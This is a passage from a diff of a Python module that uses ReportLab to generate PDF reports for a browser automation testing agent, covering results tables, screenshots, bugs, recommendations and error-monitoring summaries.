| 33 |
+
|
| 34 |
+
def __init__(self, output_dir: str = "reports"):
|
| 35 |
+
self.output_dir = Path(output_dir)
|
| 36 |
+
self.output_dir.mkdir(exist_ok=True)
|
| 37 |
+
self.styles = getSampleStyleSheet()
|
| 38 |
+
self._setup_custom_styles()
|
| 39 |
+
|
| 40 |
+
def _setup_custom_styles(self):
|
| 41 |
+
"""Setup custom styles for the PDF report."""
|
| 42 |
+
# Title style
|
| 43 |
+
self.styles.add(ParagraphStyle(
|
| 44 |
+
name='CustomTitle',
|
| 45 |
+
parent=self.styles['Title'],
|
| 46 |
+
fontSize=24,
|
| 47 |
+
spaceAfter=30,
|
| 48 |
+
alignment=TA_CENTER,
|
| 49 |
+
textColor=colors.HexColor('#2E86AB')
|
| 50 |
+
))
|
| 51 |
+
|
| 52 |
+
# Heading styles
|
| 53 |
+
self.styles.add(ParagraphStyle(
|
| 54 |
+
name='CustomHeading1',
|
| 55 |
+
parent=self.styles['Heading1'],
|
| 56 |
+
fontSize=16,
|
| 57 |
+
spaceAfter=12,
|
| 58 |
+
spaceBefore=12,
|
| 59 |
+
textColor=colors.HexColor('#2E86AB')
|
| 60 |
+
))
|
| 61 |
+
|
| 62 |
+
self.styles.add(ParagraphStyle(
|
| 63 |
+
name='CustomHeading2',
|
| 64 |
+
parent=self.styles['Heading2'],
|
| 65 |
+
fontSize=14,
|
| 66 |
+
spaceAfter=8,
|
| 67 |
+
spaceBefore=8,
|
| 68 |
+
textColor=colors.HexColor('#A23B72')
|
| 69 |
+
))
|
| 70 |
+
|
| 71 |
+
# Status styles
|
| 72 |
+
self.styles.add(ParagraphStyle(
|
| 73 |
+
name='SuccessStatus',
|
| 74 |
+
parent=self.styles['Normal'],
|
| 75 |
+
fontSize=12,
|
| 76 |
+
textColor=colors.HexColor('#28A745'),
|
| 77 |
+
backColor=colors.HexColor('#D4EDDA'),
|
| 78 |
+
borderColor=colors.HexColor('#C3E6CB'),
|
| 79 |
+
borderWidth=1,
|
| 80 |
+
borderPadding=5
|
| 81 |
+
))
|
| 82 |
+
|
| 83 |
+
self.styles.add(ParagraphStyle(
|
| 84 |
+
name='FailedStatus',
|
| 85 |
+
parent=self.styles['Normal'],
|
| 86 |
+
fontSize=12,
|
| 87 |
+
textColor=colors.HexColor('#DC3545'),
|
| 88 |
+
backColor=colors.HexColor('#F8D7DA'),
|
| 89 |
+
borderColor=colors.HexColor('#F5C6CB'),
|
| 90 |
+
borderWidth=1,
|
| 91 |
+
borderPadding=5
|
| 92 |
+
))
|
| 93 |
+
|
| 94 |
+
self.styles.add(ParagraphStyle(
|
| 95 |
+
name='ErrorStatus',
|
| 96 |
+
parent=self.styles['Normal'],
|
| 97 |
+
fontSize=12,
|
| 98 |
+
textColor=colors.HexColor('#FFC107'),
|
| 99 |
+
backColor=colors.HexColor('#FFF3CD'),
|
| 100 |
+
borderColor=colors.HexColor('#FFEAA7'),
|
| 101 |
+
borderWidth=1,
|
| 102 |
+
borderPadding=5
|
| 103 |
+
))
|
| 104 |
+
|
| 105 |
+
def generate_report(self, test_data: Dict[str, Any], output_filename: Optional[str] = None) -> str:
|
| 106 |
+
"""
|
| 107 |
+
Generate a comprehensive PDF testing report.
|
| 108 |
+
|
| 109 |
+
Args:
|
| 110 |
+
test_data: Dictionary containing test execution data
|
| 111 |
+
output_filename: Optional custom filename for the report
|
| 112 |
+
|
| 113 |
+
Returns:
|
| 114 |
+
Path to the generated PDF file
|
| 115 |
+
"""
|
| 116 |
+
if not output_filename:
|
| 117 |
+
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
|
| 118 |
+
output_filename = f"fagun_test_report_{timestamp}.pdf"
|
| 119 |
+
|
| 120 |
+
output_path = self.output_dir / output_filename
|
| 121 |
+
|
| 122 |
+
# Create PDF document
|
| 123 |
+
doc = SimpleDocTemplate(
|
| 124 |
+
str(output_path),
|
| 125 |
+
pagesize=A4,
|
| 126 |
+
rightMargin=72,
|
| 127 |
+
leftMargin=72,
|
| 128 |
+
topMargin=72,
|
| 129 |
+
bottomMargin=18
|
| 130 |
+
)
|
| 131 |
+
|
| 132 |
+
# Build report content
|
| 133 |
+
story = []
|
| 134 |
+
|
| 135 |
+
# Add title page
|
| 136 |
+
story.extend(self._create_title_page(test_data))
|
| 137 |
+
story.append(PageBreak())
|
| 138 |
+
|
| 139 |
+
# Add executive summary
|
| 140 |
+
story.extend(self._create_executive_summary(test_data))
|
| 141 |
+
story.append(PageBreak())
|
| 142 |
+
|
| 143 |
+
# Add test results overview
|
| 144 |
+
story.extend(self._create_test_results_overview(test_data))
|
| 145 |
+
story.append(PageBreak())
|
| 146 |
+
|
| 147 |
+
# Add detailed test results
|
| 148 |
+
story.extend(self._create_detailed_test_results(test_data))
|
| 149 |
+
story.append(PageBreak())
|
| 150 |
+
|
| 151 |
+
# Add screenshots section
|
| 152 |
+
story.extend(self._create_screenshots_section(test_data))
|
| 153 |
+
story.append(PageBreak())
|
| 154 |
+
|
| 155 |
+
# Add bugs and issues section
|
| 156 |
+
story.extend(self._create_bugs_section(test_data))
|
| 157 |
+
story.append(PageBreak())
|
| 158 |
+
|
| 159 |
+
# Add error monitoring section
|
| 160 |
+
story.extend(self._create_error_monitoring_section(test_data))
|
| 161 |
+
story.append(PageBreak())
|
| 162 |
+
|
| 163 |
+
# Add recommendations
|
| 164 |
+
story.extend(self._create_recommendations_section(test_data))
|
| 165 |
+
story.append(PageBreak())
|
| 166 |
+
|
| 167 |
+
# Add technical details
|
| 168 |
+
story.extend(self._create_technical_details(test_data))
|
| 169 |
+
|
| 170 |
+
# Build PDF
|
| 171 |
+
doc.build(story)
|
| 172 |
+
|
| 173 |
+
return str(output_path)
|
| 174 |
+
|
| 175 |
+
def _create_title_page(self, test_data: Dict[str, Any]) -> List:
|
| 176 |
+
"""Create the title page of the report."""
|
| 177 |
+
story = []
|
| 178 |
+
|
| 179 |
+
# Main title
|
| 180 |
+
story.append(Paragraph("🤖 Fagun Browser Automation Testing Agent", self.styles['CustomTitle']))
|
| 181 |
+
story.append(Spacer(1, 20))
|
| 182 |
+
|
| 183 |
+
# Report title
|
| 184 |
+
story.append(Paragraph("Comprehensive Testing Report", self.styles['CustomHeading1']))
|
| 185 |
+
story.append(Spacer(1, 30))
|
| 186 |
+
|
| 187 |
+
# Report metadata
|
| 188 |
+
metadata = [
|
| 189 |
+
["Report Generated:", datetime.now().strftime("%Y-%m-%d %H:%M:%S")],
|
| 190 |
+
["Test Duration:", test_data.get('duration', 'N/A')],
|
| 191 |
+
["Total Tests:", str(test_data.get('total_tests', 0))],
|
| 192 |
+
["Passed Tests:", str(test_data.get('passed_tests', 0))],
|
| 193 |
+
["Failed Tests:", str(test_data.get('failed_tests', 0))],
|
| 194 |
+
["Error Tests:", str(test_data.get('error_tests', 0))],
|
| 195 |
+
["Success Rate:", f"{test_data.get('success_rate', 0):.1f}%"]
|
| 196 |
+
]
|
| 197 |
+
|
| 198 |
+
metadata_table = Table(metadata, colWidths=[2*inch, 3*inch])
|
| 199 |
+
metadata_table.setStyle(TableStyle([
|
| 200 |
+
('BACKGROUND', (0, 0), (0, -1), colors.HexColor('#F8F9FA')),
|
| 201 |
+
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
|
| 202 |
+
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
|
| 203 |
+
('FONTNAME', (0, 0), (0, -1), 'Helvetica-Bold'),
|
| 204 |
+
('FONTSIZE', (0, 0), (-1, -1), 12),
|
| 205 |
+
('BOTTOMPADDING', (0, 0), (-1, -1), 12),
|
| 206 |
+
('BACKGROUND', (1, 0), (1, -1), colors.white),
|
| 207 |
+
]))
|
| 208 |
+
|
| 209 |
+
story.append(metadata_table)
|
| 210 |
+
story.append(Spacer(1, 40))
|
| 211 |
+
|
| 212 |
+
# Author information
|
| 213 |
+
story.append(Paragraph("Report Generated By:", self.styles['CustomHeading2']))
|
| 214 |
+
story.append(Paragraph("Mejbaur Bahar Fagun", self.styles['Normal']))
|
| 215 |
+
story.append(Paragraph("Software Engineer in Test", self.styles['Normal']))
|
| 216 |
+
story.append(Paragraph("LinkedIn: https://www.linkedin.com/in/mejbaur/", self.styles['Normal']))
|
| 217 |
+
|
| 218 |
+
return story
|
| 219 |
+
|
| 220 |
+
def _create_executive_summary(self, test_data: Dict[str, Any]) -> List:
|
| 221 |
+
"""Create the executive summary section."""
|
| 222 |
+
story = []
|
| 223 |
+
|
| 224 |
+
story.append(Paragraph("Executive Summary", self.styles['CustomHeading1']))
|
| 225 |
+
story.append(Spacer(1, 12))
|
| 226 |
+
|
| 227 |
+
# Summary statistics
|
| 228 |
+
total_tests = test_data.get('total_tests', 0)
|
| 229 |
+
passed_tests = test_data.get('passed_tests', 0)
|
| 230 |
+
failed_tests = test_data.get('failed_tests', 0)
|
| 231 |
+
error_tests = test_data.get('error_tests', 0)
|
| 232 |
+
success_rate = test_data.get('success_rate', 0)
|
| 233 |
+
|
| 234 |
+
summary_text = f"""
|
| 235 |
+
This comprehensive testing report presents the results of automated browser testing
|
| 236 |
+
performed by the Fagun Browser Automation Testing Agent. The testing session included
|
| 237 |
+
{total_tests} total test cases, with {passed_tests} tests passing successfully,
|
| 238 |
+
{failed_tests} tests failing, and {error_tests} tests encountering errors.
|
| 239 |
+
|
| 240 |
+
The overall success rate of {success_rate:.1f}% provides valuable insights into the
|
| 241 |
+
application's stability and functionality. This report includes detailed analysis of
|
| 242 |
+
each test case, screenshots of critical moments, identified bugs and issues, and
|
| 243 |
+
recommendations for improvement.
|
| 244 |
+
"""
|
| 245 |
+
|
| 246 |
+
story.append(Paragraph(summary_text, self.styles['Normal']))
|
| 247 |
+
story.append(Spacer(1, 20))
|
| 248 |
+
|
| 249 |
+
# Key findings
|
| 250 |
+
story.append(Paragraph("Key Findings", self.styles['CustomHeading2']))
|
| 251 |
+
|
| 252 |
+
findings = test_data.get('key_findings', [])
|
| 253 |
+
if not findings:
|
| 254 |
+
findings = [
|
| 255 |
+
f"Successfully executed {total_tests} automated test cases",
|
| 256 |
+
f"Achieved {success_rate:.1f}% overall success rate",
|
| 257 |
+
f"Identified {len(test_data.get('bugs', []))} potential issues requiring attention",
|
| 258 |
+
f"Captured {len(test_data.get('screenshots', []))} screenshots for analysis"
|
| 259 |
+
]
|
| 260 |
+
|
| 261 |
+
for finding in findings:
|
| 262 |
+
story.append(Paragraph(f"• {finding}", self.styles['Normal']))
|
| 263 |
+
story.append(Spacer(1, 6))
|
| 264 |
+
|
| 265 |
+
return story
|
| 266 |
+
|
| 267 |
+
def _create_test_results_overview(self, test_data: Dict[str, Any]) -> List:
|
| 268 |
+
"""Create the test results overview section."""
|
| 269 |
+
story = []
|
| 270 |
+
|
| 271 |
+
story.append(Paragraph("Test Results Overview", self.styles['CustomHeading1']))
|
| 272 |
+
story.append(Spacer(1, 12))
|
| 273 |
+
|
| 274 |
+
# Results summary table
|
| 275 |
+
results_data = [
|
| 276 |
+
["Status", "Count", "Percentage", "Description"],
|
| 277 |
+
["✅ Passed", str(test_data.get('passed_tests', 0)), f"{test_data.get('passed_percentage', 0):.1f}%", "Tests completed successfully"],
|
| 278 |
+
["❌ Failed", str(test_data.get('failed_tests', 0)), f"{test_data.get('failed_percentage', 0):.1f}%", "Tests failed due to functional issues"],
|
| 279 |
+
["⚠️ Error", str(test_data.get('error_tests', 0)), f"{test_data.get('error_percentage', 0):.1f}%", "Tests encountered technical errors"],
|
| 280 |
+
["📊 Total", str(test_data.get('total_tests', 0)), "100.0%", "All test cases executed"]
|
| 281 |
+
]
|
| 282 |
+
|
| 283 |
+
results_table = Table(results_data, colWidths=[1.5*inch, 1*inch, 1*inch, 2.5*inch])
|
| 284 |
+
results_table.setStyle(TableStyle([
|
| 285 |
+
('BACKGROUND', (0, 0), (-1, 0), colors.HexColor('#2E86AB')),
|
| 286 |
+
('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),
|
| 287 |
+
('ALIGN', (0, 0), (-1, -1), 'CENTER'),
|
| 288 |
+
('FONTNAME', (0, 0), (-1, 0), 'Helvetica-Bold'),
|
| 289 |
+
('FONTSIZE', (0, 0), (-1, 0), 12),
|
| 290 |
+
('BOTTOMPADDING', (0, 0), (-1, 0), 12),
|
| 291 |
+
('BACKGROUND', (0, 1), (-1, -1), colors.beige),
|
| 292 |
+
('GRID', (0, 0), (-1, -1), 1, colors.black)
|
| 293 |
+
]))
|
| 294 |
+
|
| 295 |
+
story.append(results_table)
|
| 296 |
+
story.append(Spacer(1, 20))
|
| 297 |
+
|
| 298 |
+
# Performance metrics
|
| 299 |
+
story.append(Paragraph("Performance Metrics", self.styles['CustomHeading2']))
|
| 300 |
+
|
| 301 |
+
metrics = test_data.get('performance_metrics', {})
|
| 302 |
+
avg_response_time = metrics.get('avg_response_time', 'N/A')
|
| 303 |
+
max_response_time = metrics.get('max_response_time', 'N/A')
|
| 304 |
+
min_response_time = metrics.get('min_response_time', 'N/A')
|
| 305 |
+
|
| 306 |
+
metrics_text = f"""
|
| 307 |
+
<b>Average Response Time:</b> {avg_response_time}<br/>
|
| 308 |
+
<b>Maximum Response Time:</b> {max_response_time}<br/>
|
| 309 |
+
<b>Minimum Response Time:</b> {min_response_time}<br/>
|
| 310 |
+
<b>Test Duration:</b> {test_data.get('duration', 'N/A')}
|
| 311 |
+
"""
|
| 312 |
+
|
| 313 |
+
story.append(Paragraph(metrics_text, self.styles['Normal']))
|
| 314 |
+
|
| 315 |
+
return story
|
| 316 |
+
|
| 317 |
+
def _create_detailed_test_results(self, test_data: Dict[str, Any]) -> List:
|
| 318 |
+
"""Create the detailed test results section."""
|
| 319 |
+
story = []
|
| 320 |
+
|
| 321 |
+
story.append(Paragraph("Detailed Test Results", self.styles['CustomHeading1']))
|
| 322 |
+
story.append(Spacer(1, 12))
|
| 323 |
+
|
| 324 |
+
test_cases = test_data.get('test_cases', [])
|
| 325 |
+
|
| 326 |
+
for i, test_case in enumerate(test_cases, 1):
|
| 327 |
+
# Test case header
|
| 328 |
+
story.append(Paragraph(f"Test Case {i}: {test_case.get('name', 'Unnamed Test')}", self.styles['CustomHeading2']))
|
| 329 |
+
|
| 330 |
+
# Test details
|
| 331 |
+
details = [
|
| 332 |
+
["Status:", test_case.get('status', 'Unknown')],
|
| 333 |
+
["Duration:", test_case.get('duration', 'N/A')],
|
| 334 |
+
["Description:", test_case.get('description', 'No description available')],
|
| 335 |
+
["Expected Result:", test_case.get('expected_result', 'N/A')],
|
| 336 |
+
["Actual Result:", test_case.get('actual_result', 'N/A')]
|
| 337 |
+
]
|
| 338 |
+
|
| 339 |
+
details_table = Table(details, colWidths=[1.5*inch, 4*inch])
|
| 340 |
+
details_table.setStyle(TableStyle([
|
| 341 |
+
('BACKGROUND', (0, 0), (0, -1), colors.HexColor('#F8F9FA')),
|
| 342 |
+
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
|
| 343 |
+
('ALIGN', (0, 0), (0, -1), 'LEFT'),
|
| 344 |
+
('ALIGN', (1, 0), (1, -1), 'LEFT'),
|
| 345 |
+
('FONTNAME', (0, 0), (0, -1), 'Helvetica-Bold'),
|
| 346 |
+
('FONTSIZE', (0, 0), (-1, -1), 10),
|
| 347 |
+
('BOTTOMPADDING', (0, 0), (-1, -1), 6),
|
| 348 |
+
('BACKGROUND', (1, 0), (1, -1), colors.white),
|
| 349 |
+
]))
|
| 350 |
+
|
| 351 |
+
story.append(details_table)
|
| 352 |
+
|
| 353 |
+
# Error details if any
|
| 354 |
+
if test_case.get('error_message'):
|
| 355 |
+
story.append(Spacer(1, 6))
|
| 356 |
+
story.append(Paragraph("Error Details:", self.styles['CustomHeading2']))
|
| 357 |
+
story.append(Paragraph(test_case.get('error_message', ''), self.styles['Normal']))
|
| 358 |
+
|
| 359 |
+
story.append(Spacer(1, 20))
|
| 360 |
+
|
| 361 |
+
return story
|
| 362 |
+
|
| 363 |
+
def _create_screenshots_section(self, test_data: Dict[str, Any]) -> List:
|
| 364 |
+
"""Create the screenshots section."""
|
| 365 |
+
story = []
|
| 366 |
+
|
| 367 |
+
story.append(Paragraph("Screenshots and Visual Evidence", self.styles['CustomHeading1']))
|
| 368 |
+
story.append(Spacer(1, 12))
|
| 369 |
+
|
| 370 |
+
screenshots = test_data.get('screenshots', [])
|
| 371 |
+
|
| 372 |
+
if not screenshots:
|
| 373 |
+
story.append(Paragraph("No screenshots were captured during this testing session.", self.styles['Normal']))
|
| 374 |
+
return story
|
| 375 |
+
|
| 376 |
+
for i, screenshot in enumerate(screenshots, 1):
|
| 377 |
+
story.append(Paragraph(f"Screenshot {i}: {screenshot.get('description', 'Test Screenshot')}", self.styles['CustomHeading2']))
|
| 378 |
+
story.append(Spacer(1, 6))
|
| 379 |
+
|
| 380 |
+
# Add screenshot if path exists
|
| 381 |
+
screenshot_path = screenshot.get('path')
|
| 382 |
+
if screenshot_path and os.path.exists(screenshot_path):
|
| 383 |
+
try:
|
| 384 |
+
img = Image(screenshot_path, width=6*inch, height=4*inch)
|
| 385 |
+
story.append(img)
|
| 386 |
+
except Exception as e:
|
| 387 |
+
story.append(Paragraph(f"Error loading screenshot: {str(e)}", self.styles['Normal']))
|
| 388 |
+
else:
|
| 389 |
+
story.append(Paragraph("Screenshot not available", self.styles['Normal']))
|
| 390 |
+
|
| 391 |
+
story.append(Spacer(1, 12))
|
| 392 |
+
|
| 393 |
+
return story
|
| 394 |
+
|
| 395 |
+
def _create_bugs_section(self, test_data: Dict[str, Any]) -> List:
|
| 396 |
+
"""Create the bugs and issues section."""
|
| 397 |
+
story = []
|
| 398 |
+
|
| 399 |
+
story.append(Paragraph("Identified Bugs and Issues", self.styles['CustomHeading1']))
|
| 400 |
+
story.append(Spacer(1, 12))
|
| 401 |
+
|
| 402 |
+
bugs = test_data.get('bugs', [])
|
| 403 |
+
|
| 404 |
+
if not bugs:
|
| 405 |
+
story.append(Paragraph("No bugs or issues were identified during this testing session.", self.styles['Normal']))
|
| 406 |
+
return story
|
| 407 |
+
|
| 408 |
+
for i, bug in enumerate(bugs, 1):
|
| 409 |
+
story.append(Paragraph(f"Bug {i}: {bug.get('title', 'Untitled Bug')}", self.styles['CustomHeading2']))
|
| 410 |
+
|
| 411 |
+
bug_details = [
|
| 412 |
+
["Severity:", bug.get('severity', 'Unknown')],
|
| 413 |
+
["Status:", bug.get('status', 'Open')],
|
| 414 |
+
["Description:", bug.get('description', 'No description available')],
|
| 415 |
+
["Steps to Reproduce:", bug.get('steps_to_reproduce', 'N/A')],
|
| 416 |
+
["Expected Behavior:", bug.get('expected_behavior', 'N/A')],
|
| 417 |
+
["Actual Behavior:", bug.get('actual_behavior', 'N/A')]
|
| 418 |
+
]
|
| 419 |
+
|
| 420 |
+
bug_table = Table(bug_details, colWidths=[1.5*inch, 4*inch])
|
| 421 |
+
bug_table.setStyle(TableStyle([
|
| 422 |
+
('BACKGROUND', (0, 0), (0, -1), colors.HexColor('#F8F9FA')),
|
| 423 |
+
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
|
| 424 |
+
('ALIGN', (0, 0), (0, -1), 'LEFT'),
|
| 425 |
+
('ALIGN', (1, 0), (1, -1), 'LEFT'),
|
| 426 |
+
('FONTNAME', (0, 0), (0, -1), 'Helvetica-Bold'),
|
| 427 |
+
('FONTSIZE', (0, 0), (-1, -1), 10),
|
| 428 |
+
('BOTTOMPADDING', (0, 0), (-1, -1), 6),
|
| 429 |
+
('BACKGROUND', (1, 0), (1, -1), colors.white),
|
| 430 |
+
]))
|
| 431 |
+
|
| 432 |
+
story.append(bug_table)
|
| 433 |
+
story.append(Spacer(1, 20))
|
| 434 |
+
|
| 435 |
+
return story
|
| 436 |
+
|
| 437 |
+
def _create_recommendations_section(self, test_data: Dict[str, Any]) -> List:
|
| 438 |
+
"""Create the recommendations section."""
|
| 439 |
+
story = []
|
| 440 |
+
|
| 441 |
+
story.append(Paragraph("Recommendations and Next Steps", self.styles['CustomHeading1']))
|
| 442 |
+
story.append(Spacer(1, 12))
|
| 443 |
+
|
| 444 |
+
recommendations = test_data.get('recommendations', [])
|
| 445 |
+
|
| 446 |
+
if not recommendations:
|
| 447 |
+
# Generate default recommendations based on test results
|
| 448 |
+
success_rate = test_data.get('success_rate', 0)
|
| 449 |
+
failed_tests = test_data.get('failed_tests', 0)
|
| 450 |
+
error_tests = test_data.get('error_tests', 0)
|
| 451 |
+
|
| 452 |
+
recommendations = []
|
| 453 |
+
|
| 454 |
+
if success_rate < 80:
|
| 455 |
+
recommendations.append("Focus on improving test stability and addressing failed test cases")
|
| 456 |
+
|
| 457 |
+
if failed_tests > 0:
|
| 458 |
+
recommendations.append("Investigate and fix the identified functional issues")
|
| 459 |
+
|
| 460 |
+
if error_tests > 0:
|
| 461 |
+
recommendations.append("Review and resolve technical errors in the test environment")
|
| 462 |
+
|
| 463 |
+
recommendations.extend([
|
| 464 |
+
"Implement continuous integration to catch issues early",
|
| 465 |
+
"Consider adding more comprehensive test coverage",
|
| 466 |
+
"Regular monitoring and maintenance of test automation suite"
|
| 467 |
+
])
|
| 468 |
+
|
| 469 |
+
for i, recommendation in enumerate(recommendations, 1):
|
| 470 |
+
story.append(Paragraph(f"{i}. {recommendation}", self.styles['Normal']))
|
| 471 |
+
story.append(Spacer(1, 6))
|
| 472 |
+
|
| 473 |
+
return story
|
| 474 |
+
|
| 475 |
+
def _create_technical_details(self, test_data: Dict[str, Any]) -> List:
|
| 476 |
+
"""Create the technical details section."""
|
| 477 |
+
story = []
|
| 478 |
+
|
| 479 |
+
story.append(Paragraph("Technical Details", self.styles['CustomHeading1']))
|
| 480 |
+
story.append(Spacer(1, 12))
|
| 481 |
+
|
| 482 |
+
# Test environment details
|
| 483 |
+
story.append(Paragraph("Test Environment", self.styles['CustomHeading2']))
|
| 484 |
+
|
| 485 |
+
env_details = [
|
| 486 |
+
["Browser:", test_data.get('browser', 'Unknown')],
|
| 487 |
+
["Browser Version:", test_data.get('browser_version', 'Unknown')],
|
| 488 |
+
["Operating System:", test_data.get('os', 'Unknown')],
|
| 489 |
+
["Test Framework:", test_data.get('framework', 'Fagun Browser Automation Testing Agent')],
|
| 490 |
+
["Execution Time:", test_data.get('execution_time', 'N/A')],
|
| 491 |
+
["Test Data:", test_data.get('test_data_source', 'N/A')]
|
| 492 |
+
]
|
| 493 |
+
|
| 494 |
+
env_table = Table(env_details, colWidths=[2*inch, 3*inch])
|
| 495 |
+
env_table.setStyle(TableStyle([
|
| 496 |
+
('BACKGROUND', (0, 0), (0, -1), colors.HexColor('#F8F9FA')),
|
| 497 |
+
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
|
| 498 |
+
('ALIGN', (0, 0), (0, -1), 'LEFT'),
|
| 499 |
+
('ALIGN', (1, 0), (1, -1), 'LEFT'),
|
| 500 |
+
('FONTNAME', (0, 0), (0, -1), 'Helvetica-Bold'),
|
| 501 |
+
('FONTSIZE', (0, 0), (-1, -1), 10),
|
| 502 |
+
('BOTTOMPADDING', (0, 0), (-1, -1), 6),
|
| 503 |
+
('BACKGROUND', (1, 0), (1, -1), colors.white),
|
| 504 |
+
]))
|
| 505 |
+
|
| 506 |
+
story.append(env_table)
|
| 507 |
+
story.append(Spacer(1, 20))
|
| 508 |
+
|
| 509 |
+
# Additional notes
|
| 510 |
+
story.append(Paragraph("Additional Notes", self.styles['CustomHeading2']))
|
| 511 |
+
|
| 512 |
+
notes = test_data.get('notes', [
|
| 513 |
+
"This report was generated automatically by the Fagun Browser Automation Testing Agent.",
|
| 514 |
+
"All test results and screenshots are based on the actual execution data.",
|
| 515 |
+
"For questions or clarifications, please contact the test automation team."
|
| 516 |
+
])
|
| 517 |
+
|
| 518 |
+
for note in notes:
|
| 519 |
+
story.append(Paragraph(f"• {note}", self.styles['Normal']))
|
| 520 |
+
story.append(Spacer(1, 6))
|
| 521 |
+
|
| 522 |
+
return story
|
| 523 |
+
|
| 524 |
+
def _create_error_monitoring_section(self, test_data: Dict[str, Any]) -> List:
|
| 525 |
+
"""Create the error monitoring section."""
|
| 526 |
+
story = []
|
| 527 |
+
|
| 528 |
+
# Section title
|
| 529 |
+
story.append(Paragraph("🔍 Error Monitoring & Detection", self.styles['Heading1']))
|
| 530 |
+
story.append(Spacer(1, 12))
|
| 531 |
+
|
| 532 |
+
error_monitoring = test_data.get("error_monitoring", {})
|
| 533 |
+
|
| 534 |
+
if not error_monitoring or error_monitoring.get("total_errors", 0) == 0:
|
| 535 |
+
story.append(Paragraph("No errors were detected during testing.", self.styles['Normal']))
|
| 536 |
+
return story
|
| 537 |
+
|
| 538 |
+
# Error summary
|
| 539 |
+
story.append(Paragraph("Error Summary", self.styles['Heading2']))
|
| 540 |
+
story.append(Spacer(1, 6))
|
| 541 |
+
|
| 542 |
+
# Create error summary table
|
| 543 |
+
error_summary_data = [
|
| 544 |
+
["Metric", "Count"],
|
| 545 |
+
["Total Errors", str(error_monitoring.get("total_errors", 0))],
|
| 546 |
+
["Console Errors", str(error_monitoring.get("console_errors", 0))],
|
| 547 |
+
["JavaScript Errors", str(error_monitoring.get("js_errors", 0))],
|
| 548 |
+
["Network Errors", str(error_monitoring.get("network_errors", 0))],
|
| 549 |
+
["DOM Errors", str(error_monitoring.get("dom_errors", 0))],
|
| 550 |
+
["Performance Issues", str(error_monitoring.get("performance_issues", 0))]
|
| 551 |
+
]
|
| 552 |
+
|
| 553 |
+
error_summary_table = Table(error_summary_data, colWidths=[2*inch, 1*inch])
|
| 554 |
+
error_summary_table.setStyle(TableStyle([
|
| 555 |
+
('BACKGROUND', (0, 0), (-1, 0), colors.HexColor('#2E86AB')),
|
| 556 |
+
('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),
|
| 557 |
+
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
|
| 558 |
+
('FONTNAME', (0, 0), (-1, 0), 'Helvetica-Bold'),
|
| 559 |
+
('FONTSIZE', (0, 0), (-1, 0), 12),
|
| 560 |
+
('BOTTOMPADDING', (0, 0), (-1, 0), 12),
|
| 561 |
+
('BACKGROUND', (0, 1), (-1, -1), colors.beige),
|
| 562 |
+
('GRID', (0, 0), (-1, -1), 1, colors.black)
|
| 563 |
+
]))
|
| 564 |
+
|
| 565 |
+
story.append(error_summary_table)
|
| 566 |
+
story.append(Spacer(1, 12))
|
| 567 |
+
|
| 568 |
+
# Errors by type
|
| 569 |
+
errors_by_type = error_monitoring.get("errors_by_type", {})
|
| 570 |
+
if errors_by_type:
|
| 571 |
+
story.append(Paragraph("Errors by Type", self.styles['Heading2']))
|
| 572 |
+
story.append(Spacer(1, 6))
|
| 573 |
+
|
| 574 |
+
type_data = [["Error Type", "Count"]]
|
| 575 |
+
for error_type, count in errors_by_type.items():
|
| 576 |
+
type_data.append([error_type.replace('_', ' ').title(), str(count)])
|
| 577 |
+
|
| 578 |
+
type_table = Table(type_data, colWidths=[2*inch, 1*inch])
|
| 579 |
+
type_table.setStyle(TableStyle([
|
| 580 |
+
('BACKGROUND', (0, 0), (-1, 0), colors.HexColor('#2E86AB')),
|
| 581 |
+
('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),
|
| 582 |
+
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
|
| 583 |
+
('FONTNAME', (0, 0), (-1, 0), 'Helvetica-Bold'),
|
| 584 |
+
('FONTSIZE', (0, 0), (-1, 0), 12),
|
| 585 |
+
('BOTTOMPADDING', (0, 0), (-1, 0), 12),
|
| 586 |
+
('BACKGROUND', (0, 1), (-1, -1), colors.beige),
|
| 587 |
+
('GRID', (0, 0), (-1, -1), 1, colors.black)
|
| 588 |
+
]))
|
| 589 |
+
|
| 590 |
+
story.append(type_table)
|
| 591 |
+
story.append(Spacer(1, 12))
|
| 592 |
+
|
| 593 |
+
# Errors by severity
|
| 594 |
+
errors_by_severity = error_monitoring.get("errors_by_severity", {})
|
| 595 |
+
if errors_by_severity:
|
| 596 |
+
story.append(Paragraph("Errors by Severity", self.styles['Heading2']))
|
| 597 |
+
story.append(Spacer(1, 6))
|
| 598 |
+
|
| 599 |
+
severity_data = [["Severity", "Count"]]
|
| 600 |
+
for severity, count in errors_by_severity.items():
|
| 601 |
+
severity_data.append([severity.title(), str(count)])
|
| 602 |
+
|
| 603 |
+
severity_table = Table(severity_data, colWidths=[2*inch, 1*inch])
|
| 604 |
+
severity_table.setStyle(TableStyle([
|
| 605 |
+
('BACKGROUND', (0, 0), (-1, 0), colors.HexColor('#2E86AB')),
|
| 606 |
+
('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),
|
| 607 |
+
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
|
| 608 |
+
('FONTNAME', (0, 0), (-1, 0), 'Helvetica-Bold'),
|
| 609 |
+
('FONTSIZE', (0, 0), (-1, 0), 12),
|
| 610 |
+
('BOTTOMPADDING', (0, 0), (-1, 0), 12),
|
| 611 |
+
('BACKGROUND', (0, 1), (-1, -1), colors.beige),
|
| 612 |
+
('GRID', (0, 0), (-1, -1), 1, colors.black)
|
| 613 |
+
]))
|
| 614 |
+
|
| 615 |
+
story.append(severity_table)
|
| 616 |
+
story.append(Spacer(1, 12))
|
| 617 |
+
|
| 618 |
+
# Detailed errors
|
| 619 |
+
detailed_errors = error_monitoring.get("detailed_errors", [])
|
| 620 |
+
if detailed_errors:
|
| 621 |
+
story.append(Paragraph("Detailed Error Information", self.styles['Heading2']))
|
| 622 |
+
story.append(Spacer(1, 6))
|
| 623 |
+
|
| 624 |
+
for i, error in enumerate(detailed_errors[:10], 1): # Limit to first 10 errors
|
| 625 |
+
story.append(Paragraph(f"Error {i}: {error.get('type', 'Unknown')}", self.styles['Heading3']))
|
| 626 |
+
